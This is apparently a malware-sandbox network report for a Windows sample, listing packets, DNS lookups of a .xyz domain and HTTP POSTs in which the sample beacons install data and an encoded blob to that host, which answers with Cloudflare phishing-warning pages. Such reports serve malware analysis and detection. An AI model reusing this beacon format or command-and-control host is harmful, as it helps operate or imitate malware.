                                                                                                                                                    Jan 29, 2021 17:36:56.244198084 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:56.244297028 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:56.245234013 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:56.298440933 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:56.298528910 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:56.346571922 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:56.357669115 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:56.357697010 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:56.357825994 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:56.358198881 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:56.358220100 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:56.358330965 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:56.359056950 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:56.360771894 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:56.421464920 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:56.421499014 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:56.421611071 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:56.421907902 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:56.421932936 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:56.422008038 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:56.422802925 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:56.470694065 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:58.555171967 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:58.555293083 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:58.601087093 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:58.605498075 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:58.605531931 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:58.605664968 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:58.606026888 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:58.606061935 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:58.606120110 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:58.606961012 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:58.752187014 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:37:04.691483974 CET4973480192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:37:04.738665104 CET8049734104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:04.741770029 CET4973480192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:37:04.743166924 CET4973480192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:37:04.788853884 CET8049734104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:04.802903891 CET8049734104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:04.803014040 CET8049734104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:04.803195953 CET8049734104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:04.803246021 CET4973480192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:37:04.803313017 CET8049734104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:04.803493977 CET8049734104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:04.803515911 CET4973480192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:37:04.804337978 CET4973480192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:37:04.850136995 CET8049734104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:04.850219965 CET4973480192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:37:09.136807919 CET4973080192.168.2.6104.21.23.16

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Jan 29, 2021 17:36:25.088690996 CET6026153192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:25.145237923 CET53602618.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:26.123815060 CET5606153192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:26.173882008 CET53560618.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:27.246218920 CET5833653192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:27.296982050 CET53583368.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:29.067965031 CET5378153192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:29.116146088 CET53537818.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:31.026458979 CET5406453192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:31.077909946 CET53540648.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:35.485811949 CET5281153192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:35.537560940 CET53528118.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:36.429775953 CET5529953192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:36.477709055 CET53552998.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:37.372859001 CET6374553192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:37.424420118 CET53637458.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.183897018 CET5005553192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:38.242616892 CET53500558.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.614181042 CET6137453192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:38.665256977 CET53613748.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:39.602166891 CET5033953192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:39.651047945 CET53503398.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:44.965429068 CET6330753192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:45.016309977 CET53633078.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.307152033 CET4969453192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:46.366413116 CET53496948.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.616519928 CET5498253192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:46.676454067 CET53549828.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:55.323558092 CET5001053192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:55.371407986 CET53500108.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:01.078157902 CET6371853192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:01.138761044 CET53637188.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:04.603930950 CET6211653192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:04.668473959 CET53621168.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:13.479643106 CET6381653192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:13.538614035 CET53638168.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:14.001022100 CET5501453192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:14.051728010 CET53550148.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:18.883923054 CET6220853192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:18.947933912 CET53622088.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:22.242372036 CET5757453192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:22.304270029 CET53575748.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:25.115819931 CET5181853192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:25.178251028 CET53518188.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:25.818749905 CET5662853192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:25.875405073 CET53566288.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:26.384660959 CET6077853192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:26.440682888 CET53607788.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:26.932027102 CET5379953192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:26.945055962 CET5468353192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:26.996061087 CET53537998.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:27.001338005 CET53546838.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:27.584101915 CET5932953192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:27.643075943 CET53593298.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:28.364412069 CET6402153192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:28.420788050 CET53640218.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:29.372565985 CET5612953192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:29.429075956 CET53561298.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:30.486442089 CET5817753192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:30.547898054 CET53581778.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:30.968092918 CET5070053192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:31.028464079 CET53507008.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:57.457674980 CET5406953192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:57.531764030 CET53540698.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:59.003036022 CET6117853192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:59.051980019 CET53611788.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:59.292176962 CET5701753192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:59.340296984 CET53570178.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:38:00.370244980 CET5632753192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:38:00.426605940 CET53563278.8.8.8192.168.2.6

                                                                                                                                                    DNS Queries

                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                    Jan 29, 2021 17:36:38.183897018 CET192.168.2.68.8.8.80x4985Standard query (0)84cfba021a5a6662.xyzA (IP address)IN (0x0001)
                                                                                                                                                    Jan 29, 2021 17:36:46.307152033 CET192.168.2.68.8.8.80x9edcStandard query (0)84cfba021a5a6662.xyzA (IP address)IN (0x0001)
                                                                                                                                                    Jan 29, 2021 17:36:46.616519928 CET192.168.2.68.8.8.80xda23Standard query (0)84cfba021a5a6662.xyzA (IP address)IN (0x0001)
                                                                                                                                                    Jan 29, 2021 17:37:04.603930950 CET192.168.2.68.8.8.80xd253Standard query (0)84CFBA021A5A6662.xyzA (IP address)IN (0x0001)

                                                                                                                                                    DNS Answers

                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                    Jan 29, 2021 17:36:38.242616892 CET8.8.8.8192.168.2.60x4985No error (0)84cfba021a5a6662.xyz104.21.23.16A (IP address)IN (0x0001)
                                                                                                                                                    Jan 29, 2021 17:36:38.242616892 CET8.8.8.8192.168.2.60x4985No error (0)84cfba021a5a6662.xyz172.67.208.74A (IP address)IN (0x0001)
                                                                                                                                                    Jan 29, 2021 17:36:46.366413116 CET8.8.8.8192.168.2.60x9edcNo error (0)84cfba021a5a6662.xyz104.21.23.16A (IP address)IN (0x0001)
                                                                                                                                                    Jan 29, 2021 17:36:46.366413116 CET8.8.8.8192.168.2.60x9edcNo error (0)84cfba021a5a6662.xyz172.67.208.74A (IP address)IN (0x0001)
                                                                                                                                                    Jan 29, 2021 17:36:46.676454067 CET8.8.8.8192.168.2.60xda23No error (0)84cfba021a5a6662.xyz104.21.23.16A (IP address)IN (0x0001)
                                                                                                                                                    Jan 29, 2021 17:36:46.676454067 CET8.8.8.8192.168.2.60xda23No error (0)84cfba021a5a6662.xyz172.67.208.74A (IP address)IN (0x0001)
                                                                                                                                                    Jan 29, 2021 17:37:04.668473959 CET8.8.8.8192.168.2.60xd253No error (0)84CFBA021A5A6662.xyz104.21.23.16A (IP address)IN (0x0001)
                                                                                                                                                    Jan 29, 2021 17:37:04.668473959 CET8.8.8.8192.168.2.60xd253No error (0)84CFBA021A5A6662.xyz172.67.208.74A (IP address)IN (0x0001)

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • 84cfba021a5a6662.xyz

                                                                                                                                                    HTTP Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.649725104.21.23.1680C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Jan 29, 2021 17:36:38.307451963 CET104OUTPOST //fine/send HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 82
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:38.307509899 CET104OUTData Raw: 74 79 70 65 3d 69 6e 73 74 61 6c 6c 26 73 65 6c 6c 65 72 3d 75 73 65 72 30 31 26 70 72 69 63 65 3d 2d 30 2e 32 35 26 67 75 69 64 3d 35 30 31 34 46 46 42 35 37 45 36 44 45 44 41 33 26 76 65 72 3d 34 35 2e 30 2e 30 26 6f 72 69 67 69 6e 3d 65 78 65
                                                                                                                                                    Data Ascii: type=install&seller=user01&price=-0.25&guid=5014FFB57E6DEDA3&ver=45.0.0&origin=exe
                                                                                                                                                    Jan 29, 2021 17:36:38.379690886 CET105INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:38 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=df39acf80abb8bafc346aa9eed4bd05c41611938198; expires=Sun, 28-Feb-21 16:36:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a0b4900004c7a80bc4000000001
                                                                                                                                                    Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=J4ah8qzvvpxv%2BczEwA4ETXiFYM2G6PafyMoa%2BTIAPCky3zl9vDsHg%2B9on5W1BxDxKklki0N0iUmMs72VHFoCwLeoOUZPPRWogFvnfJ58%2B%2FtsA3BoUw%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945f8baafc4c7a-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="view
                                                                                                                                                    Jan 29, 2021 17:36:38.379713058 CET107INData Raw: 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63
                                                                                                                                                    Data Ascii: port" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' hre
                                                                                                                                                    Jan 29, 2021 17:36:38.379725933 CET108INData Raw: 77 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20
                                                                                                                                                    Data Ascii: wo"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretendin
                                                                                                                                                    Jan 29, 2021 17:36:38.379738092 CET109INData Raw: 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f
                                                                                                                                                    Data Ascii: </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13">
                                                                                                                                                    Jan 29, 2021 17:36:38.379745007 CET109INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0
                                                                                                                                                    Jan 29, 2021 17:36:38.392950058 CET110OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:38.392991066 CET110OUTData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 61 74 57 64 54 75 4b 73 32 33 32 69 49 42 48 71 50 7a 77 53 43 59 7e
                                                                                                                                                    Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVatWdTuKs232iIBHqPzwSCY~
                                                                                                                                                    Jan 29, 2021 17:36:38.444030046 CET112INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:38 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=df39acf80abb8bafc346aa9eed4bd05c41611938198; expires=Sun, 28-Feb-21 16:36:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a0b9c00004c7abb17b000000001
                                                                                                                                                    Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=1TTxIsaBFLlODcFyVV2xP5OLGeOWNBxGyY%2B5l4VYhIX0LLTZs1rFGw%2BLFa2pD%2BFRCB35fr4x%2BzZQjEEecuGAh3F8lttgXT7%2B%2FWV5SUUhHIhsH3AJhg%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945f8c2c9d4c7a-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="vi
                                                                                                                                                    Jan 29, 2021 17:36:38.444063902 CET113INData Raw: 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d
